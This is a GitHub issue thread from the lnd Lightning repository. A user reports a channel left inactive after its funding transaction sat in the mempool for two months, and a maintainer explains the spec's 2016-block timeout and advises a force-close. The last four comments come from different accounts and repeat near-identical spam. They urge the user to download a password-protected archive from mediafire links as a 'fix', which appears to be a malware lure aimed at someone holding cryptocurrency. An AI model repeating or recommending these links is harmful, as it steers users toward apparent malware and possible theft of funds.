### ISSUE TITLE
[bug]: Channel stuck inactive - after delayed channel opening

### ISSUE THREAD

**Issue by bitsam** [lightningnetwork/lnd#9037] opened 2024-08-27 01:36 UTC
### Background

My channel open transaction got stuck in the mempool for 2 months. When it finally processed, the channel is stuck as inactive. 

### Your environment

LND 0.17.5
Debian - Raspiblitz v1.11.2
Bitcoin v26.0.0

### Steps to reproduce

I tried opening a channel to the Kraken Node - 02f1a8c87607f415c8f22c00593002775941dea48869ce23096af27b0cfdcc0b69 with transaction ID: cf515aae7522089179b9696672fdb51f51b667aa58fa59496fac71792478dcd7. The on-chain transaction got stuck in the mempool for 2 months. When it finally got processed, the channel reports open but inactive on my node. Is there any way to get the Kraken node to acknowledge my channel so I don't have to force close the channel? Is there a max time before the node on the receiving end will ignore the open channel transaction, I.e. 2 weeks? What happens then if a transaction is stuck in the Mempool for too long?

### Expected behaviour

Channel should be open and active

### Actual behaviour

Channel reports on my side with a Channel ID: 912339564495896577, but is inactive. I am unable to do any actions, like change fee rate. I also tried force close, but that also errors out.

I am a bit of a newb, can you please tell me what further information you need?

**Comment by ziggie1984** [comment] 2024-08-27 06:37
from the bolt spec(https://github.com/lightning/bolts/blob/master/02-peer-protocol.md#requirements-12):

```
A non-funding node (fundee):

SHOULD forget the channel if it does not see the correct funding transaction after a timeout of 2016 blocks.
```

So Kraken has forgotten about your channel and the only way for you to release your funds is to force-close the channel. Next time you can use CPFP to increase the confirmation time of your funding transaction.

I am going to close this issue because this this is expected behaviour.

**Closed by ziggie1984** 2024-08-27 06:37 UTC

**Comment by ESMELSTEPHANE24** [comment] 2024-08-27 07:33
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment] 2024-08-27 07:34
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment] 2024-08-28 06:41
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment] 2024-08-28 07:41
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
